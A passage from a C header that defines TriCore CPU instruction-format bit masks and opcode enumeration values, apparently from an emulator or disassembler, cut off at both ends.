MASK_OP_RR1_D(op) MASK_OP_META_D(op) #define MASK_OP_RR1_OP2(op) MASK_BITS_SHIFT(op, 18, 27) #define MASK_OP_RR1_N(op) MASK_BITS_SHIFT(op, 16, 17) #define MASK_OP_RR1_S2(op) MASK_BITS_SHIFT(op, 12, 15) #define MASK_OP_RR1_S1(op) MASK_OP_META_S1(op) /* RR2 Format */ #define MASK_OP_RR2_D(op) MASK_OP_META_D(op) #define MASK_OP_RR2_OP2(op) MASK_BITS_SHIFT(op, 16, 27) #define MASK_OP_RR2_S2(op) MASK_BITS_SHIFT(op, 12, 15) #define MASK_OP_RR2_S1(op) MASK_OP_META_S1(op) /* RRPW Format */ #define MASK_OP_RRPW_D(op) MASK_OP_META_D(op) #define MASK_OP_RRPW_POS(op) MASK_BITS_SHIFT(op, 23, 27) #define MASK_OP_RRPW_OP2(op) MASK_BITS_SHIFT(op, 21, 22) #define MASK_OP_RRPW_WIDTH(op) MASK_BITS_SHIFT(op, 16, 20) #define MASK_OP_RRPW_S2(op) MASK_BITS_SHIFT(op, 12, 15) #define MASK_OP_RRPW_S1(op) MASK_OP_META_S1(op) /* RRR Format */ #define MASK_OP_RRR_D(op) MASK_OP_META_D(op) #define MASK_OP_RRR_S3(op) MASK_BITS_SHIFT(op, 24, 27) #define MASK_OP_RRR_OP2(op) MASK_BITS_SHIFT(op, 20, 23) #define MASK_OP_RRR_N(op) MASK_BITS_SHIFT(op, 16, 17) #define MASK_OP_RRR_S2(op) MASK_BITS_SHIFT(op, 12, 15) #define MASK_OP_RRR_S1(op) MASK_OP_META_S1(op) /* RRR1 Format */ #define MASK_OP_RRR1_D(op) MASK_OP_META_D(op) #define MASK_OP_RRR1_S3(op) MASK_BITS_SHIFT(op, 24, 27) #define MASK_OP_RRR1_OP2(op) MASK_BITS_SHIFT(op, 18, 23) #define MASK_OP_RRR1_N(op) MASK_BITS_SHIFT(op, 16, 17) #define MASK_OP_RRR1_S2(op) MASK_BITS_SHIFT(op, 12, 15) #define MASK_OP_RRR1_S1(op) MASK_OP_META_S1(op) /* RRR2 Format */ #define MASK_OP_RRR2_D(op) MASK_OP_META_D(op) #define MASK_OP_RRR2_S3(op) MASK_BITS_SHIFT(op, 24, 27) #define MASK_OP_RRR2_OP2(op) MASK_BITS_SHIFT(op, 16, 23) #define MASK_OP_RRR2_S2(op) MASK_BITS_SHIFT(op, 12, 15) #define MASK_OP_RRR2_S1(op) MASK_OP_META_S1(op) /* RRRR Format */ #define MASK_OP_RRRR_D(op) MASK_OP_META_D(op) #define MASK_OP_RRRR_S3(op) MASK_BITS_SHIFT(op, 24, 27) #define MASK_OP_RRRR_OP2(op) MASK_BITS_SHIFT(op, 21, 23) #define MASK_OP_RRRR_S2(op) MASK_BITS_SHIFT(op, 12, 15) #define MASK_OP_RRRR_S1(op) MASK_OP_META_S1(op) /* RRRW Format */ #define MASK_OP_RRRW_D(op) MASK_OP_META_D(op) #define MASK_OP_RRRW_S3(op) MASK_BITS_SHIFT(op, 24, 27) #define MASK_OP_RRRW_OP2(op) MASK_BITS_SHIFT(op, 21, 23) #define MASK_OP_RRRW_WIDTH(op) MASK_BITS_SHIFT(op, 16, 20) #define MASK_OP_RRRW_S2(op) MASK_BITS_SHIFT(op, 12, 15) #define MASK_OP_RRRW_S1(op) MASK_OP_META_S1(op) /* SYS Format */ #define MASK_OP_SYS_OP2(op) MASK_BITS_SHIFT(op, 22, 27) #define MASK_OP_SYS_S1D(op) MASK_OP_META_S1(op) /* * Tricore Opcodes Enums * * Format: OPC(1|2|M)_InstrLen_Name * OPC1 = only op1 field is used * OPC2 = op1 and op2 field used part of OPCM * OPCM = op1 field used to group Instr * InstrLen = 16|32 * Name = Name of Instr */ /* 16-Bit */ enum { OPCM_16_SR_SYSTEM = 0x00, OPCM_16_SR_ACCU = 0x32, OPC1_16_SRC_ADD = 0xc2, OPC1_16_SRC_ADD_A15 = 0x92, OPC1_16_SRC_ADD_15A = 0x9a, OPC1_16_SRR_ADD = 0x42, OPC1_16_SRR_ADD_A15 = 0x12, OPC1_16_SRR_ADD_15A = 0x1a, OPC1_16_SRC_ADD_A = 0xb0, OPC1_16_SRR_ADD_A = 0x30, OPC1_16_SRR_ADDS = 0x22, OPC1_16_SRRS_ADDSC_A = 0x10, OPC1_16_SC_AND = 0x16, OPC1_16_SRR_AND = 0x26, OPC1_16_SC_BISR = 0xe0, OPC1_16_SRC_CADD = 0x8a, OPC1_16_SRC_CADDN = 0xca, OPC1_16_SB_CALL = 0x5c, OPC1_16_SRC_CMOV = 0xaa, OPC1_16_SRR_CMOV = 0x2a, OPC1_16_SRC_CMOVN = 0xea, OPC1_16_SRR_CMOVN = 0x6a, OPC1_16_SRC_EQ = 0xba, OPC1_16_SRR_EQ = 0x3a, OPC1_16_SB_J = 0x3c, OPC1_16_SBC_JEQ = 0x1e, OPC1_16_SBC_JEQ2 = 0x9e, OPC1_16_SBR_JEQ = 0x3e, OPC1_16_SBR_JEQ2 = 0xbe, OPC1_16_SBR_JGEZ = 0xce, OPC1_16_SBR_JGTZ = 0x4e, OPC1_16_SR_JI = 0xdc, OPC1_16_SBR_JLEZ = 0x8e, OPC1_16_SBR_JLTZ = 0x0e, OPC1_16_SBC_JNE = 0x5e, OPC1_16_SBC_JNE2 = 0xde, OPC1_16_SBR_JNE = 0x7e, OPC1_16_SBR_JNE2 = 0xfe, OPC1_16_SB_JNZ = 0xee, OPC1_16_SBR_JNZ = 0xf6, OPC1_16_SBR_JNZ_A = 0x7c, OPC1_16_SBRN_JNZ_T = 0xae, OPC1_16_SB_JZ = 0x6e, OPC1_16_SBR_JZ = 0x76, OPC1_16_SBR_JZ_A = 0xbc, OPC1_16_SBRN_JZ_T = 0x2e, OPC1_16_SC_LD_A = 0xd8, OPC1_16_SLR_LD_A = 0xd4, OPC1_16_SLR_LD_A_POSTINC = 0xc4, OPC1_16_SLRO_LD_A = 0xc8, OPC1_16_SRO_LD_A = 0xcc, OPC1_16_SLR_LD_BU = 0x14, OPC1_16_SLR_LD_BU_POSTINC = 0x04, OPC1_16_SLRO_LD_BU = 0x08, OPC1_16_SRO_LD_BU = 0x0c, OPC1_16_SLR_LD_H = 0x94, OPC1_16_SLR_LD_H_POSTINC = 0x84, OPC1_16_SLRO_LD_H = 0x88, OPC1_16_SRO_LD_H = 0x8c, OPC1_16_SC_LD_W = 0x58, OPC1_16_SLR_LD_W = 0x54, OPC1_16_SLR_LD_W_POSTINC = 0x44, OPC1_16_SLRO_LD_W = 0x48, OPC1_16_SRO_LD_W = 0x4c, OPC1_16_SBR_LOOP = 0xfc, OPC1_16_SRC_LT = 0xfa, OPC1_16_SRR_LT = 0x7a, OPC1_16_SC_MOV = 0xda, OPC1_16_SRC_MOV = 0x82, OPC1_16_SRR_MOV = 0x02, OPC1_16_SRC_MOV_E = 0xd2,/* 1.6 only */ OPC1_16_SRC_MOV_A = 0xa0, OPC1_16_SRR_MOV_A = 0x60, OPC1_16_SRR_MOV_AA = 0x40, OPC1_16_SRR_MOV_D = 0x80, OPC1_16_SRR_MUL = 0xe2, OPC1_16_SR_NOT = 0x46, OPC1_16_SC_OR = 0x96, OPC1_16_SRR_OR = 0xa6, OPC1_16_SRC_SH = 0x06, OPC1_16_SRC_SHA = 0x86, OPC1_16_SC_ST_A = 0xf8, OPC1_16_SRO_ST_A = 0xec, OPC1_16_SSR_ST_A = 0xf4, OPC1_16_SSR_ST_A_POSTINC = 0xe4, OPC1_16_SSRO_ST_A = 0xe8, OPC1_16_SRO_ST_B = 0x2c, OPC1_16_SSR_ST_B = 0x34, OPC1_16_SSR_ST_B_POSTINC = 0x24, OPC1_16_SSRO_ST_B = 0x28, OPC1_16_SRO_ST_H = 0xac, OPC1_16_SSR_ST_H = 0xb4, OPC1_16_SSR_ST_H_POSTINC = 0xa4, OPC1_16_SSRO_ST_H = 0xa8, OPC1_16_SC_ST_W = 0x78, OPC1_16_SRO_ST_W = 0x6c, OPC1_16_SSR_ST_W = 0x74, OPC1_16_SSR_ST_W_POSTINC = 0x64, OPC1_16_SSRO_ST_W = 0x68, OPC1_16_SRR_SUB = 0xa2, OPC1_16_SRR_SUB_A15B = 0x52, OPC1_16_SRR_SUB_15AB = 0x5a, OPC1_16_SC_SUB_A = 0x20, OPC1_16_SRR_SUBS = 0x62, OPC1_16_SRR_XOR = 0xc6, }; /* * SR Format */ /* OPCM_16_SR_SYSTEM */ enum { OPC2_16_SR_NOP = 0x00, OPC2_16_SR_RET = 0x09, OPC2_16_SR_RFE = 0x08, OPC2_16_SR_DEBUG = 0x0a, OPC2_16_SR_FRET = 0x07, }; /* OPCM_16_SR_ACCU */ enum { OPC2_16_SR_RSUB = 0x05, OPC2_16_SR_SAT_B = 0x00, OPC2_16_SR_SAT_BU = 0x01, OPC2_16_SR_SAT_H = 0x02, OPC2_16_SR_SAT_HU = 0x03, }; /* 32-Bit */ enum { /* ABS Format 1, M */ OPCM_32_ABS_LDW = 0x85, OPCM_32_ABS_LDB = 0x05, OPCM_32_ABS_LDMST_SWAP = 0xe5, OPCM_32_ABS_LDST_CONTEXT = 0x15, OPCM_32_ABS_STORE = 0xa5, OPCM_32_ABS_STOREB_H = 0x25, OPC1_32_ABS_STOREQ = 0x65, OPC1_32_ABS_LD_Q = 0x45, OPC1_32_ABS_LEA = 0xc5, /* ABSB Format */ OPC1_32_ABSB_ST_T = 0xd5, /* B Format */ OPC1_32_B_CALL = 0x6d, OPC1_32_B_CALLA = 0xed, OPC1_32_B_FCALL = 0x61, OPC1_32_B_FCALLA = 0xe1, OPC1_32_B_J = 0x1d, OPC1_32_B_JA = 0x9d, OPC1_32_B_JL = 0x5d, OPC1_32_B_JLA = 0xdd, /* Bit Format */ OPCM_32_BIT_ANDACC = 0x47, OPCM_32_BIT_LOGICAL_T1 = 0x87, OPCM_32_BIT_INSERT = 0x67, OPCM_32_BIT_LOGICAL_T2 = 0x07, OPCM_32_BIT_ORAND = 0xc7, OPCM_32_BIT_SH_LOGIC1 = 0x27, OPCM_32_BIT_SH_LOGIC2 = 0xa7, /* BO Format */ OPCM_32_BO_ADDRMODE_POST_PRE_BASE = 0x89, OPCM_32_BO_ADDRMODE_BITREVERSE_CIRCULAR = 0xa9, OPCM_32_BO_ADDRMODE_LD_POST_PRE_BASE = 0x09, OPCM_32_BO_ADDRMODE_LD_BITREVERSE_CIRCULAR = 0x29, OPCM_32_BO_ADDRMODE_STCTX_POST_PRE_BASE = 0x49, OPCM_32_BO_ADDRMODE_LDMST_BITREVERSE_CIRCULAR = 0x69, /* BOL Format */ OPC1_32_BOL_LD_A_LONGOFF = 0x99, OPC1_32_BOL_LD_W_LONGOFF = 0x19, OPC1_32_BOL_LEA_LONGOFF = 0xd9, OPC1_32_BOL_ST_W_LONGOFF = 0x59, OPC1_32_BOL_ST_A_LONGOFF = 0xb5, /* 1.6 only */ OPC1_32_BOL_LD_B_LONGOFF = 0x79, /* 1.6 only */ OPC1_32_BOL_LD_BU_LONGOFF = 0x39, /* 1.6 only */ OPC1_32_BOL_LD_H_LONGOFF = 0xc9, /* 1.6 only */ OPC1_32_BOL_LD_HU_LONGOFF = 0xb9, /* 1.6 only */ OPC1_32_BOL_ST_B_LONGOFF = 0xe9, /* 1.6 only */ OPC1_32_BOL_ST_H_LONGOFF = 0xf9, /* 1.6 only */ /* BRC Format */ OPCM_32_BRC_EQ_NEQ = 0xdf, OPCM_32_BRC_GE = 0xff, OPCM_32_BRC_JLT = 0xbf, OPCM_32_BRC_JNE = 0x9f, /* BRN Format */ OPCM_32_BRN_JTT = 0x6f, /* BRR Format */ OPCM_32_BRR_EQ_NEQ = 0x5f, OPCM_32_BRR_ADDR_EQ_NEQ = 0x7d, OPCM_32_BRR_GE = 0x7f, OPCM_32_BRR_JLT = 0x3f, OPCM_32_BRR_JNE = 0x1f, OPCM_32_BRR_JNZ = 0xbd, OPCM_32_BRR_LOOP = 0xfd, /* RC Format */ OPCM_32_RC_LOGICAL_SHIFT = 0x8f, OPCM_32_RC_ACCUMULATOR = 0x8b, OPCM_32_RC_SERVICEROUTINE = 0xad, OPCM_32_RC_MUL = 0x53, /* RCPW Format */ OPCM_32_RCPW_MASK_INSERT = 0xb7, /* RCR Format */ OPCM_32_RCR_COND_SELECT = 0xab, OPCM_32_RCR_MADD = 0x13, OPCM_32_RCR_MSUB = 0x33, /* RCRR Format */ OPC1_32_RCRR_INSERT = 0x97, /* RCRW Format */ OPCM_32_RCRW_MASK_INSERT = 0xd7, /* RLC Format */ OPC1_32_RLC_ADDI = 0x1b, OPC1_32_RLC_ADDIH = 0x9b, OPC1_32_RLC_ADDIH_A = 0x11, OPC1_32_RLC_MFCR = 0x4d, OPC1_32_RLC_MOV = 0x3b, OPC1_32_RLC_MOV_64 = 0xfb, /* 1.6 only */ OPC1_32_RLC_MOV_U = 0xbb, OPC1_32_RLC_MOV_H = 0x7b, OPC1_32_RLC_MOVH_A = 0x91, OPC1_32_RLC_MTCR = 0xcd, /* RR Format */ OPCM_32_RR_LOGICAL_SHIFT = 0x0f, OPCM_32_RR_ACCUMULATOR = 0x0b, OPCM_32_RR_ADDRESS = 0x01, OPCM_32_RR_DIVIDE = 0x4b, OPCM_32_RR_IDIRECT = 0x2d, /* RR1 Format */ OPCM_32_RR1_MUL = 0xb3, OPCM_32_RR1_MULQ = 0x93, /* RR2 Format */ OPCM_32_RR2_MUL = 0x73, /* RRPW Format */ OPCM_32_RRPW_EXTRACT_INSERT = 0x37, OPC1_32_RRPW_DEXTR = 0x77, /* RRR Format */ OPCM_32_RRR_COND_SELECT = 0x2b, OPCM_32_RRR_DIVIDE = 0x6b, /* RRR1 Format */ OPCM_32_RRR1_MADD = 0x83, OPCM_32_RRR1_MADDQ_H = 0x43, OPCM_32_RRR1_MADDSU_H = 0xc3, OPCM_32_RRR1_MSUB_H = 0xa3, OPCM_32_RRR1_MSUB_Q = 0x63, OPCM_32_RRR1_MSUBAD_H = 0xe3, /* RRR2 Format */ OPCM_32_RRR2_MADD = 0x03, OPCM_32_RRR2_MSUB = 0x23, /* RRRR Format */ OPCM_32_RRRR_EXTRACT_INSERT = 0x17, /* RRRW Format */ OPCM_32_RRRW_EXTRACT_INSERT = 0x57, /* SYS Format */ OPCM_32_SYS_INTERRUPTS = 0x0d, OPC1_32_SYS_RSTV = 0x2f, }; /* * ABS Format */ /* OPCM_32_ABS_LDW */ enum { OPC2_32_ABS_LD_A = 0x02, OPC2_32_ABS_LD_D = 0x01, OPC2_32_ABS_LD_DA = 0x03, OPC2_32_ABS_LD_W = 0x00, }; /* OPCM_32_ABS_LDB */ enum { OPC2_32_ABS_LD_B = 0x00, OPC2_32_ABS_LD_BU = 0x01, OPC2_32_ABS_LD_H = 0x02, OPC2_32_ABS_LD_HU = 0x03, }; /* OPCM_32_ABS_LDMST_SWAP */ enum { OPC2_32_ABS_LDMST = 0x01, OPC2_32_ABS_SWAP_W = 0x00, }; /* OPCM_32_ABS_LDST_CONTEXT */ enum { OPC2_32_ABS_LDLCX = 0x02, OPC2_32_ABS_LDUCX = 0x03, OPC2_32_ABS_STLCX = 0x00, OPC2_32_ABS_STUCX = 0x01, }; /* OPCM_32_ABS_STORE */ enum { OPC2_32_ABS_ST_A = 0x02, OPC2_32_ABS_ST_D = 0x01, OPC2_32_ABS_ST_DA = 0x03, OPC2_32_ABS_ST_W = 0x00, }; /* OPCM_32_ABS_STOREB_H */ enum { OPC2_32_ABS_ST_B = 0x00, OPC2_32_ABS_ST_H = 0x02, }; /* * Bit Format */ /* OPCM_32_BIT_ANDACC */ enum { OPC2_32_BIT_AND_AND_T = 0x00, OPC2_32_BIT_AND_ANDN_T = 0x03, OPC2_32_BIT_AND_NOR_T = 0x02, OPC2_32_BIT_AND_OR_T = 0x01, }; /* OPCM_32_BIT_LOGICAL_T */ enum { OPC2_32_BIT_AND_T = 0x00, OPC2_32_BIT_ANDN_T = 0x03, OPC2_32_BIT_NOR_T = 0x02, OPC2_32_BIT_OR_T = 0x01, }; /* OPCM_32_BIT_INSERT */ enum { OPC2_32_BIT_INS_T = 0x00, OPC2_32_BIT_INSN_T = 0x01, }; /* OPCM_32_BIT_LOGICAL_T2 */ enum { OPC2_32_BIT_NAND_T = 0x00, OPC2_32_BIT_ORN_T = 0x01, OPC2_32_BIT_XNOR_T = 0x02, OPC2_32_BIT_XOR_T = 0x03, }; /* OPCM_32_BIT_ORAND */ enum { OPC2_32_BIT_OR_AND_T = 0x00, OPC2_32_BIT_OR_ANDN_T = 0x03, OPC2_32_BIT_OR_NOR_T = 0x02, OPC2_32_BIT_OR_OR_T = 0x01, }; /*OPCM_32_BIT_SH_LOGIC1 */ enum { OPC2_32_BIT_SH_AND_T = 0x00, OPC2_32_BIT_SH_ANDN_T = 0x03, OPC2_32_BIT_SH_NOR_T = 0x02, OPC2_32_BIT_SH_OR_T = 0x01, }; /* OPCM_32_BIT_SH_LOGIC2 */ enum { OPC2_32_BIT_SH_NAND_T = 0x00, OPC2_32_BIT_SH_ORN_T = 0x01, OPC2_32_BIT_SH_XNOR_T = 0x02, OPC2_32_BIT_SH_XOR_T = 0x03, }; /* * BO Format */ /* OPCM_32_BO_ADDRMODE_POST_PRE_BASE */ enum { OPC2_32_BO_CACHEA_I_SHORTOFF = 0x2e, OPC2_32_BO_CACHEA_I_POSTINC = 0x0e, OPC2_32_BO_CACHEA_I_PREINC = 0x1e, OPC2_32_BO_CACHEA_W_SHORTOFF = 0x2c, OPC2_32_BO_CACHEA_W_POSTINC = 0x0c, OPC2_32_BO_CACHEA_W_PREINC = 0x1c, OPC2_32_BO_CACHEA_WI_SHORTOFF = 0x2d, OPC2_32_BO_CACHEA_WI_POSTINC = 0x0d, OPC2_32_BO_CACHEA_WI_PREINC = 0x1d, /* 1.3.1 only */ OPC2_32_BO_CACHEI_W_SHORTOFF = 0x2b, OPC2_32_BO_CACHEI_W_POSTINC = 0x0b, OPC2_32_BO_CACHEI_W_PREINC = 0x1b, OPC2_32_BO_CACHEI_WI_SHORTOFF = 0x2f, OPC2_32_BO_CACHEI_WI_POSTINC = 0x0f, OPC2_32_BO_CACHEI_WI_PREINC = 0x1f, /* end 1.3.1 only */ OPC2_32_BO_ST_A_SHORTOFF = 0x26, OPC2_32_BO_ST_A_POSTINC = 0x06, OPC2_32_BO_ST_A_PREINC = 0x16, OPC2_32_BO_ST_B_SHORTOFF = 0x20, OPC2_32_BO_ST_B_POSTINC = 0x00, OPC2_32_BO_ST_B_PREINC = 0x10, OPC2_32_BO_ST_D_SHORTOFF = 0x25, OPC2_32_BO_ST_D_POSTINC = 0x05, OPC2_32_BO_ST_D_PREINC = 0x15, OPC2_32_BO_ST_DA_SHORTOFF = 0x27, OPC2_32_BO_ST_DA_POSTINC = 0x07, OPC2_32_BO_ST_DA_PREINC = 0x17, OPC2_32_BO_ST_H_SHORTOFF = 0x22, OPC2_32_BO_ST_H_POSTINC = 0x02, OPC2_32_BO_ST_H_PREINC = 0x12, OPC2_32_BO_ST_Q_SHORTOFF = 0x28, OPC2_32_BO_ST_Q_POSTINC = 0x08, OPC2_32_BO_ST_Q_PREINC = 0x18, OPC2_32_BO_ST_W_SHORTOFF = 0x24, OPC2_32_BO_ST_W_POSTINC = 0x04, OPC2_32_BO_ST_W_PREINC = 0x14, }; /* OPCM_32_BO_ADDRMODE_BITREVERSE_CIRCULAR */ enum { OPC2_32_BO_CACHEA_I_BR = 0x0e, OPC2_32_BO_CACHEA_I_CIRC = 0x1e, OPC2_32_BO_CACHEA_W_BR = 0x0c, OPC2_32_BO_CACHEA_W_CIRC = 0x1c, OPC2_32_BO_CACHEA_WI_BR = 0x0d, OPC2_32_BO_CACHEA_WI_CIRC = 0x1d, OPC2_32_BO_ST_A_BR = 0x06, OPC2_32_BO_ST_A_CIRC = 0x16, OPC2_32_BO_ST_B_BR = 0x00, OPC2_32_BO_ST_B_CIRC = 0x10, OPC2_32_BO_ST_D_BR = 0x05, OPC2_32_BO_ST_D_CIRC = 0x15, OPC2_32_BO_ST_DA_BR = 0x07, OPC2_32_BO_ST_DA_CIRC = 0x17, OPC2_32_BO_ST_H_BR = 0x02, OPC2_32_BO_ST_H_CIRC = 0x12, OPC2_32_BO_ST_Q_BR = 0x08, OPC2_32_BO_ST_Q_CIRC = 0x18, OPC2_32_BO_ST_W_BR = 0x04, OPC2_32_BO_ST_W_CIRC = 0x14, }; /* OPCM_32_BO_ADDRMODE_LD_POST_PRE_BASE */ enum { OPC2_32_BO_LD_A_SHORTOFF = 0x26, OPC2_32_BO_LD_A_POSTINC = 0x06, OPC2_32_BO_LD_A_PREINC = 0x16, OPC2_32_BO_LD_B_SHORTOFF = 0x20, OPC2_32_BO_LD_B_POSTINC = 0x00, OPC2_32_BO_LD_B_PREINC = 0x10, OPC2_32_BO_LD_BU_SHORTOFF = 0x21, OPC2_32_BO_LD_BU_POSTINC = 0x01, OPC2_32_BO_LD_BU_PREINC = 0x11, OPC2_32_BO_LD_D_SHORTOFF = 0x25, OPC2_32_BO_LD_D_POSTINC = 0x05, OPC2_32_BO_LD_D_PREINC = 0x15, OPC2_32_BO_LD_DA_SHORTOFF = 0x27, OPC2_32_BO_LD_DA_POSTINC = 0x07, OPC2_32_BO_LD_DA_PREINC = 0x17, OPC2_32_BO_LD_H_SHORTOFF = 0x22, OPC2_32_BO_LD_H_POSTINC = 0x02, OPC2_32_BO_LD_H_PREINC = 0x12, OPC2_32_BO_LD_HU_SHORTOFF = 0x23, OPC2_32_BO_LD_HU_POSTINC = 0x03, OPC2_32_BO_LD_HU_PREINC = 0x13, OPC2_32_BO_LD_Q_SHORTOFF = 0x28, OPC2_32_BO_LD_Q_POSTINC = 0x08, OPC2_32_BO_LD_Q_PREINC = 0x18, OPC2_32_BO_LD_W_SHORTOFF = 0x24, OPC2_32_BO_LD_W_POSTINC = 0x04, OPC2_32_BO_LD_W_PREINC = 0x14, }; /* OPCM_32_BO_ADDRMODE_LD_BITREVERSE_CIRCULAR */ enum { OPC2_32_BO_LD_A_BR = 0x06, OPC2_32_BO_LD_A_CIRC = 0x16, OPC2_32_BO_LD_B_BR = 0x00, OPC2_32_BO_LD_B_CIRC = 0x10, OPC2_32_BO_LD_BU_BR = 0x01, OPC2_32_BO_LD_BU_CIRC = 0x11, OPC2_32_BO_LD_D_BR = 0x05, OPC2_32_BO_LD_D_CIRC = 0x15, OPC2_32_BO_LD_DA_BR = 0x07, OPC2_32_BO_LD_DA_CIRC = 0x17, OPC2_32_BO_LD_H_BR = 0x02, OPC2_32_BO_LD_H_CIRC = 0x12, OPC2_32_BO_LD_HU_BR = 0x03, OPC2_32_BO_LD_HU_CIRC = 0x13, OPC2_32_BO_LD_Q_BR = 0x08, OPC2_32_BO_LD_Q_CIRC = 0x18, OPC2_32_BO_LD_W_BR = 0x04, OPC2_32_BO_LD_W_CIRC = 0x14, }; /* OPCM_32_BO_ADDRMODE_STCTX_POST_PRE_BASE */ enum { OPC2_32_BO_LDLCX_SHORTOFF = 0x24, OPC2_32_BO_LDMST_SHORTOFF = 0x21, OPC2_32_BO_LDMST_POSTINC = 0x01, OPC2_32_BO_LDMST_PREINC = 0x11, OPC2_32_BO_LDUCX_SHORTOFF = 0x25, OPC2_32_BO_LEA_SHORTOFF = 0x28, OPC2_32_BO_STLCX_SHORTOFF = 0x26, OPC2_32_BO_STUCX_SHORTOFF = 0x27, OPC2_32_BO_SWAP_W_SHORTOFF = 0x20, OPC2_32_BO_SWAP_W_POSTINC = 0x00, OPC2_32_BO_SWAP_W_PREINC = 0x10, OPC2_32_BO_CMPSWAP_W_SHORTOFF = 0x23, OPC2_32_BO_CMPSWAP_W_POSTINC = 0x03, OPC2_32_BO_CMPSWAP_W_PREINC = 0x13, OPC2_32_BO_SWAPMSK_W_SHORTOFF = 0x22, OPC2_32_BO_SWAPMSK_W_POSTINC = 0x02, OPC2_32_BO_SWAPMSK_W_PREINC = 0x12, }; /*OPCM_32_BO_ADDRMODE_LDMST_BITREVERSE_CIRCULAR */ enum { OPC2_32_BO_LDMST_BR = 0x01, OPC2_32_BO_LDMST_CIRC = 0x11, OPC2_32_BO_SWAP_W_BR = 0x00, OPC2_32_BO_SWAP_W_CIRC = 0x10, OPC2_32_BO_CMPSWAP_W_BR = 0x03, OPC2_32_BO_CMPSWAP_W_CIRC = 0x13, OPC2_32_BO_SWAPMSK_W_BR = 0x02, OPC2_32_BO_SWAPMSK_W_CIRC = 0x12, }; /* * BRC Format */ /*OPCM_32_BRC_EQ_NEQ */ enum { OPC2_32_BRC_JEQ = 0x00, OPC2_32_BRC_JNE = 0x01, }; /* OPCM_32_BRC_GE */ enum { OP2_32_BRC_JGE = 0x00, OPC_32_BRC_JGE_U = 0x01, }; /* OPCM_32_BRC_JLT */ enum { OPC2_32_BRC_JLT = 0x00, OPC2_32_BRC_JLT_U = 0x01, }; /* OPCM_32_BRC_JNE */ enum { OPC2_32_BRC_JNED = 0x01, OPC2_32_BRC_JNEI = 0x00, }; /* * BRN Format */ /* OPCM_32_BRN_JTT */ enum { OPC2_32_BRN_JNZ_T = 0x01, OPC2_32_BRN_JZ_T = 0x00, }; /* * BRR Format */ /* OPCM_32_BRR_EQ_NEQ */ enum { OPC2_32_BRR_JEQ = 0x00, OPC2_32_BRR_JNE = 0x01, }; /* OPCM_32_BRR_ADDR_EQ_NEQ */ enum { OPC2_32_BRR_JEQ_A = 0x00, OPC2_32_BRR_JNE_A = 0x01, }; /*OPCM_32_BRR_GE */ enum { OPC2_32_BRR_JGE = 0x00, OPC2_32_BRR_JGE_U = 0x01, }; /* OPCM_32_BRR_JLT */ enum { OPC2_32_BRR_JLT = 0x00, OPC2_32_BRR_JLT_U = 0x01, }; /* OPCM_32_BRR_JNE */ enum { OPC2_32_BRR_JNED = 0x01, OPC2_32_BRR_JNEI = 0x00, }; /* OPCM_32_BRR_JNZ */ enum { OPC2_32_BRR_JNZ_A = 0x01, OPC2_32_BRR_JZ_A = 0x00, }; /* OPCM_32_BRR_LOOP */ enum { OPC2_32_BRR_LOOP = 0x00, OPC2_32_BRR_LOOPU = 0x01, }; /* * RC Format */ /* OPCM_32_RC_LOGICAL_SHIFT */ enum { OPC2_32_RC_AND = 0x08, OPC2_32_RC_ANDN = 0x0e, OPC2_32_RC_NAND = 0x09, OPC2_32_RC_NOR = 0x0b, OPC2_32_RC_OR = 0x0a, OPC2_32_RC_ORN = 0x0f, OPC2_32_RC_SH = 0x00, OPC2_32_RC_SH_H = 0x40, OPC2_32_RC_SHA = 0x01, OPC2_32_RC_SHA_H = 0x41, OPC2_32_RC_SHAS = 0x02, OPC2_32_RC_XNOR = 0x0d, OPC2_32_RC_XOR = 0x0c, }; /* OPCM_32_RC_ACCUMULATOR */ enum { OPC2_32_RC_ABSDIF = 0x0e, OPC2_32_RC_ABSDIFS = 0x0f, OPC2_32_RC_ADD = 0x00, OPC2_32_RC_ADDC = 0x05, OPC2_32_RC_ADDS = 0x02, OPC2_32_RC_ADDS_U = 0x03, OPC2_32_RC_ADDX = 0x04, OPC2_32_RC_AND_EQ = 0x20, OPC2_32_RC_AND_GE = 0x24, OPC2_32_RC_AND_GE_U = 0x25, OPC2_32_RC_AND_LT = 0x22, OPC2_32_RC_AND_LT_U = 0x23, OPC2_32_RC_AND_NE = 0x21, OPC2_32_RC_EQ = 0x10, OPC2_32_RC_EQANY_B = 0x56, OPC2_32_RC_EQANY_H = 0x76, OPC2_32_RC_GE = 0x14, OPC2_32_RC_GE_U = 0x15, OPC2_32_RC_LT = 0x12, OPC2_32_RC_LT_U = 0x13, OPC2_32_RC_MAX = 0x1a, OPC2_32_RC_MAX_U = 0x1b, OPC2_32_RC_MIN = 0x18, OPC2_32_RC_MIN_U = 0x19, OPC2_32_RC_NE = 0x11, OPC2_32_RC_OR_EQ = 0x27, OPC2_32_RC_OR_GE = 0x2b, OPC2_32_RC_OR_GE_U = 0x2c, OPC2_32_RC_OR_LT = 0x29, OPC2_32_RC_OR_LT_U = 0x2a, OPC2_32_RC_OR_NE = 0x28, OPC2_32_RC_RSUB = 0x08, OPC2_32_RC_RSUBS = 0x0a, OPC2_32_RC_RSUBS_U = 0x0b, OPC2_32_RC_SH_EQ = 0x37, OPC2_32_RC_SH_GE = 0x3b, OPC2_32_RC_SH_GE_U = 0x3c, OPC2_32_RC_SH_LT = 0x39, OPC2_32_RC_SH_LT_U = 0x3a, OPC2_32_RC_SH_NE = 0x38, OPC2_32_RC_XOR_EQ = 0x2f, OPC2_32_RC_XOR_GE = 0x33, OPC2_32_RC_XOR_GE_U = 0x34, OPC2_32_RC_XOR_LT = 0x31, OPC2_32_RC_XOR_LT_U = 0x32, OPC2_32_RC_XOR_NE = 0x30, }; /* OPCM_32_RC_SERVICEROUTINE */ enum { OPC2_32_RC_BISR = 0x00, OPC2_32_RC_SYSCALL = 0x04, }; /* OPCM_32_RC_MUL */ enum { OPC2_32_RC_MUL_32 = 0x01, OPC2_32_RC_MUL_64 = 0x03, OPC2_32_RC_MULS_32 = 0x05, OPC2_32_RC_MUL_U_64 = 0x02, OPC2_32_RC_MULS_U_32 = 0x04, }; /* * RCPW Format */ /* OPCM_32_RCPW_MASK_INSERT */ enum { OPC2_32_RCPW_IMASK = 0x01, OPC2_32_RCPW_INSERT = 0x00, }; /* * RCR Format */ /* OPCM_32_RCR_COND_SELECT */ enum { OPC2_32_RCR_CADD = 0x00, OPC2_32_RCR_CADDN = 0x01, OPC2_32_RCR_SEL = 0x04, OPC2_32_RCR_SELN = 0x05, }; /* OPCM_32_RCR_MADD */ enum { OPC2_32_RCR_MADD_32 = 0x01, OPC2_32_RCR_MADD_64 = 0x03, OPC2_32_RCR_MADDS_32 = 0x05, 